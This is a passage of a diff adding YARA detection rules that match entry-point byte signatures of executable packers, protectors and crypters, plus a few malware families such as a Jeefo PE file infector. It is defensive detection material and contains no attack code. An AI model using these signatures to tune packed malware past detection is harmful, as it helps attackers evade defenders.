+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RatPackerGluestub
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 40 20 FF 00 00 00 00 00 00 00 ?? BE 00 60 40 00 8D BE 00 B0 FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CreateInstallv200335
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 81 EC 0C 04 00 00 53 56 57 55 68 60 50 40 00 6A 01 6A 00 FF 15 D8 80 40 00 8B F0 FF 15 D4 80 40 00 3D B7 00 00 00 75 0F 56 FF 15 B8 80 40 00 6A 02 FF 15 A4 80 40 00 33 DB E8 F2 FE FF FF 68 02 7F 00 00 89 1D 94 74 40 00 53 89 1D 98 74 40 00 FF 15 E4 80 40 }
+
+condition:
+		$a0
+}
+	
+	
+rule SPECb3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5B 53 50 45 43 5D E8 ?? ?? ?? ?? 5D 8B C5 81 ED 41 24 40 ?? 2B 85 89 26 40 ?? 83 E8 0B 89 85 8D 26 40 ?? 0F B6 B5 91 26 40 ?? 8B FD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SPECb2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 57 51 53 E8 ?? ?? ?? ?? 5D 8B C5 81 ED ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 83 E8 09 89 85 ?? ?? ?? ?? 0F B6 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXV200V290MarkusOberhumerLaszloMolnarJohnReiser
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner01MicrosoftVisualBasic5060Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? E8 0A 00 00 00 00 00 00 00 00 00 30 00 00 00 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXModifiedStubbFarbrauschConsumerConsulting
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule E2CbyDoP
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? BF ?? ?? B9 ?? ?? FC 57 F3 A5 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SVKProtectorv111
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED 06 ?? ?? ?? 64 A0 23 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PCShrinkerv071
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 BD ?? ?? ?? ?? 01 AD 54 3A 40 ?? FF B5 50 3A 40 ?? 6A 40 FF 95 88 3A 40 ?? 50 50 2D ?? ?? ?? ?? 89 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Petite21
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 }
+
+condition:
+		$a0
+}
+	
+	
+rule BeRoEXEPackerv100DLLLZBRRBeRoFarbrausch
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 BE ?? ?? ?? ?? BF ?? ?? ?? ?? FC B2 80 33 DB A4 B3 02 E8 ?? ?? ?? ?? 73 F6 33 C9 E8 ?? ?? ?? ?? 73 1C 33 C0 E8 ?? ?? ?? ?? 73 23 B3 02 41 B0 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule hmimysPackerV12hmimys
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 95 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 5E AD 50 AD 50 97 AD 50 AD 50 AD 50 E8 C0 01 00 00 AD 50 AD 93 87 DE B9 ?? ?? ?? ?? E3 1D 8A 07 47 04 ?? 3C ?? 73 F7 8B 07 3C ?? 75 F3 B0 00 0F C8 05 ?? ?? ?? ?? 2B C7 AB E2 E3 AD 85 C0 74 2B 97 56 FF 13 8B E8 AC 84 C0 75 FB 66 AD 66 85 C0 74 E9 AC 83 EE 03 84 C0 74 08 56 55 FF 53 04 AB EB E4 AD 50 55 FF 53 04 AB EB E0 C3 8B 0A 3B 4A 04 75 0A C7 42 10 01 00 00 00 0C FF C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EnigmaProtector131Build20070615DllSukhovVladimirSergeNMarkin
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 81 ED ?? ?? ?? ?? E9 49 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8A 84 24 28 00 00 00 80 F8 01 0F 84 07 00 00 00 B8 ?? ?? ?? ?? FF E0 E9 04 00 00 00 ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 81 C0 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 30 10 40 49 0F 85 F6 FF FF FF E9 04 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PureBasicDLLNeilHodgson
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 7C 24 08 01 75 ?? 8B 44 24 04 A3 ?? ?? ?? 10 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HPA
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E 8B D6 83 ?? ?? 83 ?? ?? 06 0E 1E 0E 1F 33 FF 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov310
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 E0 97 44 00 68 20 C0 42 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 4C 41 44 00 33 D2 8A D4 89 15 90 A1 44 00 8B C8 81 E1 FF 00 00 00 89 0D 8C A1 44 00 C1 E1 08 03 CA 89 0D 88 A1 44 00 C1 E8 10 A3 84 A1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upack012betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 48 01 40 00 AD ?? ?? ?? A5 ?? C0 33 C9 ?? ?? ?? ?? ?? ?? ?? F3 AB ?? ?? 0A ?? ?? ?? ?? AD 50 97 51 ?? 87 F5 58 8D 54 86 5C ?? D5 72 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B6 5F FF C1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxNcuLi1688
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0E 1E B8 55 AA CD 21 3D 49 4C 74 ?? 0E 0E 1F 07 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VProtectorvcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 55 53 45 52 33 32 2E 64 6C 6C 00 00 47 44 49 33 32 2E 64 6C 6C 00 00 00 00 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 53 6C 65 65 70 00 00 00 47 65 74 56 65 72 73 69 6F 6E 00 00 00 47 65 74 43 6F 6D 6D 61 6E 64 4C 69 6E 65 41 00 00 00 47 65 74 53 74 61 72 74 75 70 49 6E 66 6F 41 00 00 00 47 65 74 41 43 50 00 00 00 43 72 65 61 74 65 54 68 72 65 61 64 00 00 00 44 65 66 57 69 6E 64 6F 77 50 72 6F 63 41 00 00 00 52 65 67 69 73 74 65 72 43 6C 61 73 73 45 78 41 00 00 00 43 72 65 61 74 65 57 69 6E 64 6F 77 45 78 41 00 00 00 47 65 74 53 79 73 74 65 6D 4D 65 74 72 69 63 73 00 00 00 53 68 6F 77 57 69 6E 64 6F 77 00 00 00 47 65 74 44 43 00 00 00 52 65 6C 65 61 73 65 44 43 00 00 00 46 69 6E 64 57 69 6E 64 6F 77 41 00 00 00 47 65 74 4D 65 73 73 61 67 65 41 00 00 00 44 65 73 74 72 6F 79 57 69 6E 64 6F 77 00 00 00 53 65 74 50 69 78 65 6C }
+	$a1 = { 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 55 53 45 52 33 32 2E 64 6C 6C 00 00 47 44 49 33 32 2E 64 6C 6C 00 00 00 00 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 53 6C 65 65 70 00 00 00 47 65 74 56 65 72 73 69 6F 6E 00 00 00 47 65 74 43 6F 6D 6D 61 6E 64 4C 69 6E 65 41 00 00 00 47 65 74 53 74 61 72 74 75 70 49 6E 66 6F 41 00 00 00 47 65 74 41 43 50 00 00 00 43 72 65 61 74 65 54 68 72 65 61 64 00 00 00 44 65 66 57 69 6E 64 6F 77 50 72 6F 63 41 00 00 00 52 65 67 69 73 74 65 72 43 6C 61 73 73 45 78 41 00 00 00 43 72 65 61 74 65 57 69 6E 64 6F 77 45 78 41 00 00 00 47 65 74 53 79 73 74 65 6D 4D 65 74 72 69 63 73 00 00 00 53 68 6F 77 57 69 6E 64 6F 77 00 00 00 47 65 74 44 43 00 00 00 52 65 6C 65 61 73 65 44 43 00 00 00 46 69 6E 64 57 69 6E 64 6F 77 41 00 00 00 47 65 74 4D 65 73 73 61 67 65 41 00 00 00 44 65 73 74 72 6F 79 57 69 6E 64 6F 77 00 00 00 53 65 74 50 69 78 65 6C 00 00 00 00 }
+	$a2 = { 00 00 00 00 55 73 65 72 33 32 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 64 69 33 32 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 44 65 66 57 69 6E 64 6F 77 50 72 6F 63 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 52 65 67 69 73 74 65 72 43 6C 61 73 73 45 78 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 43 72 65 61 74 65 57 69 6E 64 6F 77 45 78 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 47 65 74 53 79 73 74 65 6D 4D 65 74 72 69 63 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 53 68 6F 77 57 69 6E 64 6F 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 47 65 74 44 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 52 65 6C 65 61 73 65 44 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 46 69 6E 64 57 69 6E 64 6F 77 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 65 74 4D 65 73 73 61 67 65 41 00 }
+
+condition:
+		$a0 or $a1 or $a2
+}
+	
+	
+rule XPackv142
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 72 ?? C3 8B DE 83 ?? ?? C1 ?? ?? 8C D8 03 C3 8E D8 8B DF 83 ?? ?? C1 ?? ?? 8C C0 03 C3 8E C0 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule W32JeefoPEFileInfector
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 83 C4 F4 6A 02 A1 C8 ?? ?? ?? FF D0 E8 ?? ?? ?? ?? C9 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeSplitter13SplitCryptMethodBillPrisonerTPOC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 15 10 05 23 14 56 57 57 48 12 0B 16 66 66 66 66 66 66 66 66 66 02 C7 56 66 66 66 ED 26 6A ED 26 6A ED 66 E3 A6 69 E2 39 64 66 66 ED 2E 56 E6 5F 0D 12 61 E6 5F 2D 12 64 8D 81 E6 1F 6A 55 12 64 8D B9 ED 26 7E A5 33 ED 8A 8D 69 21 03 12 36 14 09 05 27 02 02 14 03 15 15 27 ED 2B 6A ED 13 6E ED B8 65 10 5A EB 10 7E EB 10 06 ED 50 65 95 30 ED 10 46 65 95 55 B4 ED A0 ED 50 65 95 37 ED 2B 6A EB DF AB 76 26 66 3F DF 68 66 66 66 9A 95 C0 6D AF 13 64 }
+	$a1 = { E8 00 00 00 00 5D 81 ED 05 10 40 00 B9 ?? ?? ?? ?? 8D 85 1D 10 40 00 80 30 66 40 E2 FA 8F 98 67 66 66 ?? ?? ?? ?? ?? ?? ?? 66 }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule AntiDote12BetaDemoSISTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 69 D6 00 00 E8 C6 FD FF FF 68 69 D6 00 00 E8 BC FD FF FF 83 C4 08 E8 A4 FF FF FF 84 C0 74 2F 68 04 01 00 00 68 B0 21 60 00 6A 00 FF 15 08 10 60 00 E8 29 FF FF FF 50 68 88 10 60 00 68 78 10 60 00 68 B0 21 60 00 E8 A4 FD FF FF 83 C4 10 33 C0 C2 10 00 90 90 90 90 90 90 90 90 90 90 90 90 8B 4C 24 08 56 8B 74 24 08 33 D2 8B C6 F7 F1 8B C6 85 D2 74 08 33 D2 F7 F1 40 0F AF C1 5E C3 90 8B 44 24 04 53 55 56 8B 48 3C 57 03 C8 33 D2 8B 79 54 8B 71 38 8B C7 F7 F6 85 D2 74 0C 8B C7 33 D2 F7 F6 8B F8 47 0F AF FE 33 C0 33 DB 66 8B 41 14 8D 54 08 18 33 C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv211bAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 3D 04 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor224StrongbitSoftCompleteDevelopmenth1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 F7 FE FF FF 05 ?? ?? 00 00 FF E0 E8 EB FE FF FF 05 ?? ?? 00 00 FF E0 E8 04 00 00 00 FF FF FF FF 5E C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor224StrongbitSoftCompleteDevelopmenth2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 F7 FE FF FF 05 ?? ?? 00 00 FF E0 E8 EB FE FF FF 05 ?? ?? 00 00 FF E0 E8 ?? 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor224StrongbitSoftCompleteDevelopmenth3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 }
+
+condition:
+		$a0
+}
+	
+	
+rule ProActivateV10XTurboPowerSoftwareCompany
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B9 0E 00 00 00 6A 00 6A 00 49 75 F9 51 53 56 57 B8 ?? ?? ?? ?? 90 90 90 90 90 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 A1 ?? ?? ?? ?? 83 C0 05 A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 0D 00 00 00 E8 85 E2 FF FF 81 3D ?? ?? ?? ?? 21 7E 7E 40 75 7A 81 3D ?? ?? ?? ?? 43 52 43 33 75 6E 81 3D ?? ?? ?? ?? 32 40 7E 7E 75 62 81 3D ?? ?? ?? ?? 21 7E 7E 40 75 56 81 3D ?? ?? ?? ?? 43 52 43 33 75 4A 81 3D ?? ?? ?? ?? 32 40 7E 7E 75 3E 81 3D ?? ?? ?? ?? 21 7E 7E 40 75 32 81 3D ?? ?? ?? ?? 43 52 43 33 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PackMasterv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 01 00 00 00 E8 83 C4 04 E8 01 00 00 00 E9 5D 81 ED D3 22 40 00 E8 04 02 00 00 E8 EB 08 EB 02 CD 20 FF 24 24 9A 66 BE 47 46 }
+	$a1 = { 60 E8 01 ?? ?? ?? E8 83 C4 04 E8 01 ?? ?? ?? E9 5D 81 ED D3 22 40 ?? E8 04 02 ?? ?? E8 EB 08 EB 02 CD 20 FF 24 24 9A 66 BE 47 46 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule DBPEv153
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 55 57 56 52 51 53 9C FA E8 ?? ?? ?? ?? 5D 81 ED 5B 53 40 ?? B0 ?? E8 ?? ?? ?? ?? 5E 83 C6 11 B9 27 ?? ?? ?? 30 06 46 49 75 FA }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeJoiner152Stubengine16GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 46 FD FF FF 50 E8 0C 00 00 00 FF 25 08 20 40 00 FF 25 0C 20 40 00 FF 25 10 20 40 00 FF 25 14 20 40 00 FF 25 18 20 40 00 FF 25 1C 20 40 00 FF 25 20 20 40 00 FF 25 24 20 40 00 FF 25 28 20 40 00 FF 25 00 20 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectv12AlexeySolodovnikovh1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 60 E8 1B 00 00 00 E9 FC 8D B5 0F 06 00 00 8B FE B9 97 00 00 00 AD 35 78 56 34 12 AB 49 75 F6 EB 04 5D 45 55 C3 E9 ?? ?? ?? 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule FSGv110EngdulekxtBorlandDelphiMicrosoftVisualCx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PENightMare2Beta
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E9 ?? ?? ?? ?? EF 40 03 A7 07 8F 07 1C 37 5D 43 A7 04 B9 2C 3A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MinGWGCC3x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 C7 04 24 ?? 00 00 00 FF 15 ?? ?? ?? ?? E8 ?? ?? FF FF ?? ?? ?? ?? ?? ?? ?? ?? 55 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PIRITv15
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 4D CD 21 E8 ?? ?? FD E8 ?? ?? B4 51 CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Reg2Exe224byJanVorel
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 00 E8 CF 20 00 00 A3 F4 45 40 00 E8 CB 20 00 00 6A 0A 50 6A 00 FF 35 F4 45 40 00 E8 07 00 00 00 50 E8 BB 20 00 00 CC 68 48 00 00 00 68 00 00 00 00 68 F8 45 40 00 E8 06 19 00 00 83 C4 0C 8B 44 24 04 A3 FC 45 40 00 68 00 00 00 00 68 A0 0F 00 00 68 00 00 00 00 E8 8C 20 00 00 A3 F8 45 40 00 E8 02 20 00 00 E8 32 1D 00 00 E8 20 19 00 00 E8 A3 16 00 00 68 01 00 00 00 68 38 46 40 00 68 00 00 00 00 8B 15 38 46 40 00 E8 71 4F 00 00 B8 00 00 10 00 BB 01 00 00 00 E8 82 4F 00 00 FF 35 48 41 40 00 B8 00 01 00 00 E8 9D 15 00 00 8D 0D 1C 46 40 00 5A E8 82 16 00 00 68 00 01 00 00 FF 35 1C 46 40 00 E8 24 20 00 00 A3 24 46 40 00 FF 35 48 41 40 00 FF 35 24 46 40 00 FF 35 1C 46 40 00 E8 DC 10 00 00 8D 0D 14 46 40 00 5A E8 4A 16 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SVKProtectorv13xEngPavolCerven
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 ?? ?? 42 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 56 FF 95 0C 61 00 00 59 5D 40 85 C0 75 3C 80 3E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThinstallEmbedded2609Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 58 BB AD 19 00 00 2B C3 50 68 ?? ?? ?? ?? 68 B0 1C 00 00 68 80 00 00 00 E8 35 FF FF FF E9 99 FF FF FF 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXcrypterarchphaseNWC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BF ?? ?? ?? 00 81 FF ?? ?? ?? 00 74 10 81 2F ?? 00 00 00 83 C7 04 BB 05 ?? ?? 00 FF E3 BE ?? ?? ?? 00 FF E6 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule StarForceProtectionDriverProtectionTechnology
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 57 68 ?? 0D 01 00 68 00 ?? ?? 00 E8 50 ?? FF FF 68 ?? ?? ?? 00 68 ?? ?? ?? 00 68 ?? ?? ?? 00 68 ?? ?? ?? 00 68 ?? ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FishPEV10Xhellfish
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? C3 90 09 00 00 00 2C 00 00 00 ?? ?? ?? ?? C4 03 00 00 BC A0 00 00 00 40 01 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 99 00 00 00 00 8A 00 00 00 10 00 00 ?? ?? 00 00 ?? ?? ?? ?? 00 00 02 00 00 00 A0 00 00 18 01 00 00 ?? ?? ?? ?? 00 00 0C 00 00 00 B0 00 00 38 0A 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 C0 00 00 40 39 00 00 ?? ?? ?? ?? 00 00 08 00 00 00 00 01 00 C8 06 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECrypter
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D EB 26 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv051
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 5E 8B FE 68 79 01 59 EB 01 EB AC 54 E8 03 5C EB 08 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule LY_WGKXwwwszleyucom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4D 79 46 75 6E 00 62 73 }
+
+condition:
+		$a0
+}
+	
+	
+rule ASProtect13321RegisteredAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 01 ?? ?? ?? E8 01 00 00 00 C3 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV111ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 4A 02 00 00 8D 9D 11 01 00 00 33 FF EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtMicrosoftVisualC4xLCCWin321x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2C 71 1B CA EB 01 2A EB 01 65 8D 35 80 ?? ?? 00 80 C9 84 80 C9 68 BB F4 00 00 00 EB 01 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule dePACKdeNULL
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 DD 60 68 00 ?? ?? ?? 68 ?? ?? 00 00 E8 ?? 00 00 00 }
+	$a1 = { EB 01 DD 60 68 00 ?? ?? ?? 68 ?? ?? ?? 00 E8 ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? D2 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule EXECryptorv1401
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 B8 00 00 00 00 ?? ?? 00 31 C0 89 41 14 89 41 18 80 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakePELockNT204emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
